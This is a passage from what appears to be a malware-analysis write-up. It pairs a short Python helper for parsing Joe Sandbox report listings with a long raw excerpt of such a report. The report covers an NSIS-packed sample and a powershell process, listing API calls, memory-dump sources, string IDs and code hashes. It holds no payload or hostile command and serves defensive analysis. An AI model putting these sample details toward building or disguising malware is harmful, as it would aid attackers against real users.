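    """APIs the function calls itself; subcall lines describe its callees."""
    return {a["api"] for a in record["apis"] if a["parent"] is None}


def index_by_api_string_id(records):
    """API String ID -> first call site, for matching functions across samples."""
    idx = defaultdict(list)
    for r in records:
        idx[r["meta"].get("API String ID")].append(r["apis"][0]["ref"] if r["apis"] else None)
    return dict(idx)


def find_launchers(records):
    """(ref, api, literal args) for each direct process-creating call; '?' and raw hex dropped."""
    hits = []
    for r in records:
        for a in r["apis"]:
            if a["parent"] is None and a["api"] in LAUNCH_APIS:
                literals = [x for x in a["args"] if x and x != "?" and not HEX8.fullmatch(x)]
                hits.append((a["ref"], a["api"], literals))
    return hits
```

Feed it the whole "Functions" listing of a report saved as text and `find_launchers` gives the process-creation sites to inspect first, while the API String ID index is the value to pivot on when comparing this sample's NSIS stub against other submissions.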
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\160420241245287.exe,C:\Users\user\Desktop\160420241245287.exe,80000000,00000003), ref: 00405987
                                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\160420241245287.exe,C:\Users\user\Desktop\160420241245287.exe,80000000,00000003), ref: 00405997
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-224404859
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
• lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
• CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
• lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
Memory Dump Source
• Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
Similarity
• API ID:
• String ID: \V7k
• API String ID: 0-2194220512
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
Similarity
• API ID:
• String ID: tPqq$tPqq$$qq$$qq$$qq$$qq$$qq$$qq
• API String ID: 0-2594718439
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'qq$4'qq$4'qq$4'qq
• API String ID: 0-4257899170
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
Similarity
• API ID:
• String ID: $qq$$qq$$qq
• API String ID: 0-3876402241
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'qq$4'qq
• API String ID: 0-2334807182
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'qq$4'qq
• API String ID: 0-2334807182
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'qq$4'qq
• API String ID: 0-2334807182
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'qq$4'qq
• API String ID: 0-2334807182
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'qq
• API String ID: 0-1915349394
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'qq
• API String ID: 0-1915349394
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'qq
• API String ID: 0-1915349394
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'qq
• API String ID: 0-1915349394
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'qq
• API String ID: 0-1915349394
                                                                        • Opcode ID: e5ebccdbab24a00a6f2f10821a63ec0bcbf0462dee7c32034b7b23d67b3ef9cb
                                                                        • Instruction ID: cde5606119dbdc1da0902b247b4b497695fb14bf2db2784b241c13290f136d82
                                                                        • Opcode Fuzzy Hash: e5ebccdbab24a00a6f2f10821a63ec0bcbf0462dee7c32034b7b23d67b3ef9cb
                                                                        • Instruction Fuzzy Hash: C20281B4B012149FC724DB58C851BAABBB2EBC5305F5184A4DA099F381CB76ED86CFD1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \V7k
                                                                        • API String ID: 0-2194220512
                                                                        • Opcode ID: d620ec3a8d8ef41a76642ddd964797892fc3ea7c3621946d808df706fb64a035
                                                                        • Instruction ID: 1f89ff57d86721e502bfb47b0742b9c3897a5cbeaa767bbe9a77fd29b87df14c
                                                                        • Opcode Fuzzy Hash: d620ec3a8d8ef41a76642ddd964797892fc3ea7c3621946d808df706fb64a035
                                                                        • Instruction Fuzzy Hash: 52B14A70E042099FDF14CFA8D8857ADBBF2EF88314F1481A9E816A7254EB74A845CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq
                                                                        • API String ID: 0-1915349394
                                                                        • Opcode ID: 1be5923c4d4322d25a9479eded76809927ad3b95f886cb48e4df89aff1005201
                                                                        • Instruction ID: fb206bda157000003b849d5b0c982e26de01949e8e115cbe3b5bdf9d19c0aa5e
                                                                        • Opcode Fuzzy Hash: 1be5923c4d4322d25a9479eded76809927ad3b95f886cb48e4df89aff1005201
                                                                        • Instruction Fuzzy Hash: 60313BF0B032129BDB209B64840037EBBA2ABC1670F549075D528DB281EB37D885CFF6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: I7k
                                                                        • API String ID: 0-510898141
                                                                        • Opcode ID: 9c953d8a8759bee56083ab70cbfddbee6c74f28dab411b027d7a3e5eb00bf200
                                                                        • Instruction ID: f016ef83cb6934296e692779336f3ac25cdfdd7ca7b572bd0ea959355bd37c14
                                                                        • Opcode Fuzzy Hash: 9c953d8a8759bee56083ab70cbfddbee6c74f28dab411b027d7a3e5eb00bf200
                                                                        • Instruction Fuzzy Hash: AD313030B002688BCB25AB34C855BEEBBB6AF49348F0044F9D5099B265DF399E45CF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b639f7cd794a35c8476036c5b02f18ea8dcfb08446bcf78c9d0f1fbee713af7e
                                                                        • Instruction ID: e492e0559f44b200e75ec5afa0566eb009d385154251b6a65a10a67f666ba3f0
                                                                        • Opcode Fuzzy Hash: b639f7cd794a35c8476036c5b02f18ea8dcfb08446bcf78c9d0f1fbee713af7e
                                                                        • Instruction Fuzzy Hash: B8225BB4A01245DFDB14CB88C480B6ABBB2FFC9314F65C069E9199B755CB72EC46CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: af50243ab07b9f43cedd2453267423873a514515504db5f138923255f0d6444c
                                                                        • Instruction ID: 9e351553c1be0d1ba36579a73e27805d56844902caf687dc0bd207bb1ccbfa57
                                                                        • Opcode Fuzzy Hash: af50243ab07b9f43cedd2453267423873a514515504db5f138923255f0d6444c
                                                                        • Instruction Fuzzy Hash: 3F125BB4B00219DFCB14CB98C441A6EBBF2BBCA315F64C069D9199B755CB32EC85CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 378ad09577c851ece8ea6e734c1f647a1354762da6bdd3ea9a838345de9bec6f
                                                                        • Instruction ID: 41a671c1ec28e6a0296b0264ca4be380380d13557cc4db88fa6122489da667e9
                                                                        • Opcode Fuzzy Hash: 378ad09577c851ece8ea6e734c1f647a1354762da6bdd3ea9a838345de9bec6f
                                                                        • Instruction Fuzzy Hash: 831269B5A01245DFDB14CB88C481F6ABBB2BFC9314F64C069E9189B755CB72EC46CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1ea97a893ef91ac1851ae42d71b16a5d3bbe2951e060b83b25aba48719e910fb
                                                                        • Instruction ID: 506f13e17ab97f6e9f925664d201adbceea5c5780619edc10cb243580ce216d9
                                                                        • Opcode Fuzzy Hash: 1ea97a893ef91ac1851ae42d71b16a5d3bbe2951e060b83b25aba48719e910fb
                                                                        • Instruction Fuzzy Hash: 2C026AB4B00209DFDB14CB98C541EAABBB2FBC5315F54C069E919AB351CB72EC85CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0916cdd56082940471d90f720d8a357866ef00e6f49291279d118867a06a3397
                                                                        • Instruction ID: 2c82dd7b0005dd73b1b55a9fdc60f394401abd7fbec228c5b3c48b941af00e76
                                                                        • Opcode Fuzzy Hash: 0916cdd56082940471d90f720d8a357866ef00e6f49291279d118867a06a3397
                                                                        • Instruction Fuzzy Hash: 3AF14CB4A00219DFDB14CB88C541EAABBB2FBC9315F54C169E918AB355C732EC85CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f032d48e10ce1c574cb58bb573887d24cbb7614aebdb32f7205ec4aa00c8a5de
                                                                        • Instruction ID: 72ab4cb3d269aa0a5317df097906223f46ddf4fd34dedc2cbf778c12a594e2f4
                                                                        • Opcode Fuzzy Hash: f032d48e10ce1c574cb58bb573887d24cbb7614aebdb32f7205ec4aa00c8a5de
                                                                        • Instruction Fuzzy Hash: 35E12775A052199FDB05CF98D884AADBBF2FF88320F258599E804AB355D731FD81CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7b10e4dfc300eca05693bf84da6c0d33ff3f20d73b75b2453798f3c0073fe8eb
                                                                        • Instruction ID: 2f172bdf098736d514df142a1c7e14c0b708ff5fa1a48a2ab7b208580daafe82
                                                                        • Opcode Fuzzy Hash: 7b10e4dfc300eca05693bf84da6c0d33ff3f20d73b75b2453798f3c0073fe8eb
                                                                        • Instruction Fuzzy Hash: A7B17070E04609DFDB14CFA8D9817ADBBF1EF48314F2485A9E816E7254FB74A841CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0b94836574d990fdc26e82d5b4bd8c22e417148170e1d351244a9961ead8a254
                                                                        • Instruction ID: 3c44b708614348b369c95c8e6817c2f7f01e9be062bc27d9e5d398750cbfa695
                                                                        • Opcode Fuzzy Hash: 0b94836574d990fdc26e82d5b4bd8c22e417148170e1d351244a9961ead8a254
                                                                        • Instruction Fuzzy Hash: B6A17F35A002089FDB14EFA5D944A9DBBF2FF84304F1185A9E806AF354EB75ED49CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 020dbb5d1e6c3fb812d6b82bc5df11735d2200cf414b5244ccc57b3594b22574
                                                                        • Instruction ID: 4641d30db1aedfaa7dbbce7ca7f4c97760d8cb985ee3dd107946a2175703255c
                                                                        • Opcode Fuzzy Hash: 020dbb5d1e6c3fb812d6b82bc5df11735d2200cf414b5244ccc57b3594b22574
                                                                        • Instruction Fuzzy Hash: 34714DF1F043169FCB249B68884127EFBE5AFC5250F18847AD815CB641EB37D951CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a125450052b89e3542d0faf4d3ad4ef8af263073385b86161533d46210652439
                                                                        • Instruction ID: a8cce3bd73759596dd44b4e96323a3dff829bd6f836214951fa5a4e4d5b965ca
                                                                        • Opcode Fuzzy Hash: a125450052b89e3542d0faf4d3ad4ef8af263073385b86161533d46210652439
                                                                        • Instruction Fuzzy Hash: 2B918F74A006498FCB09CF58C494AAEFBB1FF88310B2486E9D815AB3A5D735FC51CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 06a1f0e656d12de1b5e882afa816a8e492508ee29a1099bc4088c0704b1215a9
                                                                        • Instruction ID: ca91dd74432d3ca2aab662c4f978ba7ef52daa7b00bbe2120ddca6fa28b2b7b2
                                                                        • Opcode Fuzzy Hash: 06a1f0e656d12de1b5e882afa816a8e492508ee29a1099bc4088c0704b1215a9
                                                                        • Instruction Fuzzy Hash: F2815CB5A01205DFCB14CF54C494AAABBB2EBC9324F55C169D819AB355C733EC42CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6d5fd2721769067c319d65260705df3219845d19523845a769036a9a52902695
                                                                        • Instruction ID: 1104cf0ebb1b8f4ae72be6590be2d6e8bec203bd553c84716b41cd649e25afac
                                                                        • Opcode Fuzzy Hash: 6d5fd2721769067c319d65260705df3219845d19523845a769036a9a52902695
                                                                        • Instruction Fuzzy Hash: C9715D70A006099FDB14DFA4D884AEDBBF2FF88304F1484A9D406AB794DF74AD4ACB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: de60a3a1b91ca378d8fc1caf7ee0a3553521f0966275919448093a3656da45ed
                                                                        • Instruction ID: cb9b9dc196b6a43aa27a28c0c9f0cd11670eabe609fe80e90a0b47953a6609f1
                                                                        • Opcode Fuzzy Hash: de60a3a1b91ca378d8fc1caf7ee0a3553521f0966275919448093a3656da45ed
                                                                        • Instruction Fuzzy Hash: 83617D70A006099FCB14DF68C894ADDBBF2FF85314F14C5A9D4069B755EB71AC46CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d1928c27ea46c6d6b1d593b3b218ab93eef47e61193308cb2711783cc96e0642
                                                                        • Instruction ID: ce0c0fb5be205e7a0607bf22d3dfb6bca74b853de3dcebe552aaf9a046c983c2
                                                                        • Opcode Fuzzy Hash: d1928c27ea46c6d6b1d593b3b218ab93eef47e61193308cb2711783cc96e0642
                                                                        • Instruction Fuzzy Hash: C34145F2708212CBDB119778881166ABBA2BFC1326B14C4BAD9158F791CF33DD45C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq$$qq$$qq$$qq
                                                                        • API String ID: 0-1584382674
                                                                        • Opcode ID: f27b4ec004119ba20b51e735e1c3d3ce9ab63ea502f73b9fbe618f42773ecffa
                                                                        • Instruction ID: ce61830cc1e6c072aa3db60b8b0c550664419b94fabe8dc2f08707f9d7e50db1
                                                                        • Opcode Fuzzy Hash: f27b4ec004119ba20b51e735e1c3d3ce9ab63ea502f73b9fbe618f42773ecffa
                                                                        • Instruction Fuzzy Hash: F63108B171820EDFDF258F24C8402AB77A5AFC6362F24C425E8694B266CB33E951C750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tPqq$$qq$$qq$$qq$$qq
                                                                        • API String ID: 0-3720336148
                                                                        • Opcode ID: ca9fb04cf297ca6e94ef58481b9fd8c05549c05e63e7c6c39f0dfcce056e1a7e
                                                                        • Instruction ID: 96a822598a13e931e204c0c6ef311603dfbaa2d991d196c028367e7bc413e519
                                                                        • Opcode Fuzzy Hash: ca9fb04cf297ca6e94ef58481b9fd8c05549c05e63e7c6c39f0dfcce056e1a7e
                                                                        • Instruction Fuzzy Hash: DF2107B5606312DFCB248F64C940976BBB4EFC1621B1540A7E968DB362D736DD04C771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (oqq$(oqq$(oqq$(oqq
                                                                        • API String ID: 0-3701351494
                                                                        • Opcode ID: 663dedcadd37e440530685f0a20ef545555c0df97e2c6f5173759e6901c30c29
                                                                        • Instruction ID: 3973b57b4c8f77d5a553c79977ef1719e7fca2c8fb08bd3a8e0deb13c81e8ad4
                                                                        • Opcode Fuzzy Hash: 663dedcadd37e440530685f0a20ef545555c0df97e2c6f5173759e6901c30c29
                                                                        • Instruction Fuzzy Hash: DCF128B1708306CFCF259F68C8447ABBBB2AFC5311F14846AE5258B291CB37E861CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq$4'qq$4'qq
                                                                        • API String ID: 0-4257899170
                                                                        • Opcode ID: 524d92f6543278b560c633b771a752cf4e3d5cbcbc5e0e5b7f89db7aa4cc21cc
                                                                        • Instruction ID: 0d114fe81184fde03b7c2ac5d858ecfc792183dc7cb6d80f7b6f1bccdaf3fe9e
                                                                        • Opcode Fuzzy Hash: 524d92f6543278b560c633b771a752cf4e3d5cbcbc5e0e5b7f89db7aa4cc21cc
                                                                        • Instruction Fuzzy Hash: 7EE137B17083168FDB258B68880176BBBB2BFC6311F18C4BAD529CB295DB33D845C791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tPqq$tPqq$tPqq$tPqq
                                                                        • API String ID: 0-2887196909
                                                                        • Opcode ID: dbf596f7c63f573f1355239edf5f601fc4b70bc13d8113f27cb44776ac46e7ba
